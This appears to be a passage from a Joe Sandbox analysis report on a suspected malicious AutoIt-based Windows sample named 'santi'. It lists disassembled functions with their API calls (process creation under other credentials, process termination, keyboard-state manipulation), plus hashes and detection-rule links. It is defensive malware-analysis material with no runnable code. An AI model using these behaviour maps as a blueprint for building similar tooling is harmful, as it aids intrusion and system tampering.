                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0031AFAE
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0031AFB5
                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0031AFC4
                                                                • CloseHandle.KERNEL32(00000004), ref: 0031AFCF
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0031AFFE
                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 0031B012
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                • String ID:
                                                                • API String ID: 1413079979-0
                                                                • Opcode ID: c49874ebec3bd7feba139df5a833a45b0e836e27f52b1e1110b8951de9b825b4
                                                                • Instruction ID: 6939e103cee4e18e7ea18259ea0be89e03e68bae0d1701f92937b64fc97ac4bc
                                                                • Opcode Fuzzy Hash: c49874ebec3bd7feba139df5a833a45b0e836e27f52b1e1110b8951de9b825b4
                                                                • Instruction Fuzzy Hash: 5F217CB2505209ABCB078FA4DD09BEE7BADAB48305F158015FA01A2161C3B6CDA1EB61
                                                                Function 0034EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                  • Part of subcall function 002FAF83: BeginPath.GDI32(?), ref: 002FB009
                                                                  • Part of subcall function 002FAF83: SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0034EC20
                                                                • LineTo.GDI32(00000000,00000003,?), ref: 0034EC34
                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0034EC42
                                                                • LineTo.GDI32(00000000,00000000,?), ref: 0034EC52
                                                                • EndPath.GDI32(00000000), ref: 0034EC62
                                                                • StrokePath.GDI32(00000000), ref: 0034EC72
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                • String ID:
                                                                • API String ID: 43455801-0
                                                                • Opcode ID: 125efeb5490d05be012a2a45120106d93429649707c5e8ff6a8bd17aabbaba0e
                                                                • Instruction ID: 270416f53688ff950be56a21573bb1fdd7b3cdf999b7cfd0e1a05ae0cd8a4fff
                                                                • Opcode Fuzzy Hash: 125efeb5490d05be012a2a45120106d93429649707c5e8ff6a8bd17aabbaba0e
                                                                • Instruction Fuzzy Hash: 5011097250014DBFEB129F90DD88EEA7F6DEB08350F048122FE0889170D7B19D55DBA0
                                                                Function 0031E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 0031E1C0
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0031E1D1
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0031E1D8
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0031E1E0
                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0031E1F7
                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0031E209
                                                                  • Part of subcall function 00319AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00319A05,00000000,00000000,?,00319DDB), ref: 0031A53A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                • String ID:
                                                                • API String ID: 603618608-0
                                                                • Opcode ID: 57feb81ca2aee82649cdc9c0224ac94475b7ce1ef43821cb1cf0d3e616d85348
                                                                • Instruction ID: 38d27bf1a76265202b220655daa40b3c351b184082b93ce017063d6d553775eb
                                                                • Opcode Fuzzy Hash: 57feb81ca2aee82649cdc9c0224ac94475b7ce1ef43821cb1cf0d3e616d85348
                                                                • Instruction Fuzzy Hash: 690184B5F00214BFEB119BA6DC45B5EBFB8EB48351F008066EE04A7290D6B19C00CB60
                                                                Function 00307B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __init_pointers.LIBCMT ref: 00307B47
                                                                  • Part of subcall function 0030123A: __initp_misc_winsig.LIBCMT ref: 0030125E
                                                                  • Part of subcall function 0030123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00307F51
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00307F65
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00307F78
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00307F8B
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00307F9E
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00307FB1
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00307FC4
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00307FD7
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00307FEA
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00307FFD
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00308010
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00308023
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00308036
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00308049
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0030805C
                                                                  • Part of subcall function 0030123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0030806F
                                                                • __mtinitlocks.LIBCMT ref: 00307B4C
                                                                  • Part of subcall function 00307E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0039AC68,00000FA0,?,?,00307B51,00305E77,00396C70,00000014), ref: 00307E41
                                                                • __mtterm.LIBCMT ref: 00307B55
                                                                  • Part of subcall function 00307BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00307B5A,00305E77,00396C70,00000014), ref: 00307D3F
                                                                  • Part of subcall function 00307BBD: _free.LIBCMT ref: 00307D46
                                                                  • Part of subcall function 00307BBD: DeleteCriticalSection.KERNEL32(0039AC68,?,?,00307B5A,00305E77,00396C70,00000014), ref: 00307D68
                                                                • __calloc_crt.LIBCMT ref: 00307B7A
                                                                • GetCurrentThreadId.KERNEL32 ref: 00307BA3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                • String ID:
                                                                • API String ID: 2942034483-0
                                                                • Opcode ID: 049d9ac75b6803e5c683b8d23e4d6916c2c67a7ad664e1bce4ad61ccea052962
                                                                • Instruction ID: 8aca5a091daad62df3e8cd3fde755e13a7e999e3b75fffd61efd8353d1098103
                                                                • Opcode Fuzzy Hash: 049d9ac75b6803e5c683b8d23e4d6916c2c67a7ad664e1bce4ad61ccea052962
                                                                • Instruction Fuzzy Hash: FCF09632E1F75219E6277734BC2B64A36C49F01770F214699F860CD1D2FF61B84281A0
                                                                Function 002E27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002E281D
                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 002E2825
                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002E2830
                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002E283B
                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 002E2843
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 002E284B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Virtual
                                                                • String ID:
                                                                • API String ID: 4278518827-0
                                                                • Opcode ID: 315ae8985ea5337380e1b9e29f3ce636427e2659935051723864f1b3fa126db0
                                                                • Instruction ID: 6054fbf9922697eaa27802b1482b4c8a956f66e14e69abd50e852ddba3eb1fa7
                                                                • Opcode Fuzzy Hash: 315ae8985ea5337380e1b9e29f3ce636427e2659935051723864f1b3fa126db0
                                                                • Instruction Fuzzy Hash: 260167B0A02B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                                Function 00329AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 1423608774-0
                                                                • Opcode ID: e2d190e1c5dcffd8d463732f9253d01887b600e125b3f3b377ac02ffce0260f9
                                                                • Instruction ID: 90eed7a47fab4a4f93afcf1c22525d1b8df90a15157c9c52206c608a5d90efd0
                                                                • Opcode Fuzzy Hash: e2d190e1c5dcffd8d463732f9253d01887b600e125b3f3b377ac02ffce0260f9
                                                                • Instruction Fuzzy Hash: E701A436A02321ABD7175B55FC59EEF776DFF88701F05482AF503960A4DBB49810DB60
                                                                Function 00327BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00327C07
                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00327C1D
                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00327C2C
                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C3B
                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C45
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00327C4C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 839392675-0
                                                                • Opcode ID: 725e6c29a5c478b337ea59736bf9313ac5567c60ae1ee6304a5eda14ae83794e
                                                                • Instruction ID: 48ca8b9c729b6aaf0489666c91d586642f5e582d1d5f9a9d9015681dddde166e
                                                                • Opcode Fuzzy Hash: 725e6c29a5c478b337ea59736bf9313ac5567c60ae1ee6304a5eda14ae83794e
                                                                • Instruction Fuzzy Hash: 1FF03A76A41168BBE7225B62EC0EEEF7B7CEFCAB11F004018FA01A1061D7E05A41C6B5
                                                                Function 00329A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00329A33
                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A44
                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A51
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A5E
                                                                  • Part of subcall function 003293D1: CloseHandle.KERNEL32(?,?,00329A6B,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 003293DB
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00329A71
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00355DEE,?,?,?,?,?,002EED63), ref: 00329A78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                • String ID:
                                                                • API String ID: 3495660284-0
                                                                • Opcode ID: fe70984f2af7937de012e430f1642cabf3347071ed882ca82c0075d00e6f7651
                                                                • Instruction ID: 03a9b1cee441a11daed439949d5e20b1473eee1ce11273d04293bfdc1014c144
                                                                • Opcode Fuzzy Hash: fe70984f2af7937de012e430f1642cabf3347071ed882ca82c0075d00e6f7651
                                                                • Instruction Fuzzy Hash: EFF05E36A41211ABD7131BA4FC99EEE772DFF88701F154826F603950A0DBB59811DB60
                                                                Function 002E1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FF4EA: std::exception::exception.LIBCMT ref: 002FF51E
                                                                  • Part of subcall function 002FF4EA: __CxxThrowException@8.LIBCMT ref: 002FF533
                                                                • __swprintf.LIBCMT ref: 002E1EA6
                                                                Strings
                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002E1D49
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                • API String ID: 2125237772-557222456
                                                                • Opcode ID: 301b7118097dd0501732ccad3b28f1f7d0b1882bcdaa3c2decdc47bfe5023360
                                                                • Instruction ID: 4b1bca6e9145ee5009b53eb46e235a844cdf559c67587bb938c9ae8d55bec23f
                                                                • Opcode Fuzzy Hash: 301b7118097dd0501732ccad3b28f1f7d0b1882bcdaa3c2decdc47bfe5023360
                                                                • Instruction Fuzzy Hash: 2191D1711643819FC715EF26C895C6EB7A8BF95700F84092DF885972A1EB70ED28CB92
                                                                Function 0033AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 0033B006
                                                                • CharUpperBuffW.USER32(?,?), ref: 0033B115
                                                                • VariantClear.OLEAUT32(?), ref: 0033B298
                                                                  • Part of subcall function 00329DC5: VariantInit.OLEAUT32(00000000), ref: 00329E05
                                                                  • Part of subcall function 00329DC5: VariantCopy.OLEAUT32(?,?), ref: 00329E0E
                                                                  • Part of subcall function 00329DC5: VariantClear.OLEAUT32(?), ref: 00329E1A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                • API String ID: 4237274167-1221869570
                                                                • Opcode ID: f34461afd5642bff215e267d931b1570605a63c2962fb9cacf717b8de7317baf
                                                                • Instruction ID: bc01a0f28f7115896042dcee314c8e0d031e11b38cd0044c50344a295b3f501f
                                                                • Opcode Fuzzy Hash: f34461afd5642bff215e267d931b1570605a63c2962fb9cacf717b8de7317baf
                                                                • Instruction Fuzzy Hash: 3E9199306083419FCB15DF25C48196BFBE8AF89704F14896EF98ACB362DB31E945CB52
                                                                Function 00325347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • _memset.LIBCMT ref: 00325438
                                                                • GetMenuItemInfoW.USER32(?), ref: 00325467
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00325513
                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0032553D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                • String ID: 0
                                                                • API String ID: 4152858687-4108050209
                                                                • Opcode ID: 09110614d8e863316dcd1b8fb25385b0181bb693f4dffb4338ae78e680c97988
                                                                • Instruction ID: 831c197e055042399ef57c05d6b5d1b9eaced3d36d45cabf800662839ffbda61
                                                                • Opcode Fuzzy Hash: 09110614d8e863316dcd1b8fb25385b0181bb693f4dffb4338ae78e680c97988
                                                                • Instruction Fuzzy Hash: DC5111316147219BD316EF29E8407BBB7E8EF86360F150629F996D3190DBB0CE408B92
                                                                Function 00320213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0032027B
                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003202B1
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003202C2
                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00320344
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                • String ID: DllGetClassObject
                                                                • API String ID: 753597075-1075368562
                                                                • Opcode ID: d3236253b813bac2952f26b4982d180da352be3ae7d60d4ffb3032eed8b273b3
                                                                • Instruction ID: ea7e3c5cec6869eb0a9bcccc876bbe34edd04d72c949070b3c6e731cf4fb52fe
                                                                • Opcode Fuzzy Hash: d3236253b813bac2952f26b4982d180da352be3ae7d60d4ffb3032eed8b273b3
                                                                • Instruction Fuzzy Hash: AD415E75A00214EFDB0ACF54D8C4B9A7BB9EF49314F1580A9EA099F206D7B1D948CBA0
                                                                Function 00325007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00325075
                                                                • GetMenuItemInfoW.USER32 ref: 00325091
                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003250D7
                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003A1708,00000000), ref: 00325120
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                • String ID: 0
                                                                • API String ID: 1173514356-4108050209
                                                                • Opcode ID: af9829ecdb8809581acea100955b16df6be0dfa38dbbb959ed473c94d957e81b
                                                                • Instruction ID: fc5768e511ea2c423fdb1f9531fef90f9fda6aa7ceabe8a134968db2c1013a7b
                                                                • Opcode Fuzzy Hash: af9829ecdb8809581acea100955b16df6be0dfa38dbbb959ed473c94d957e81b
                                                                • Instruction Fuzzy Hash: 7E41F6312047119FDB12DF24EC80B2BB7E8AF85324F04861EF9559B2D1D770EA10CB62
                                                                Function 0032390C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112keyboardwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00323966
                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00323982
                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003239EF
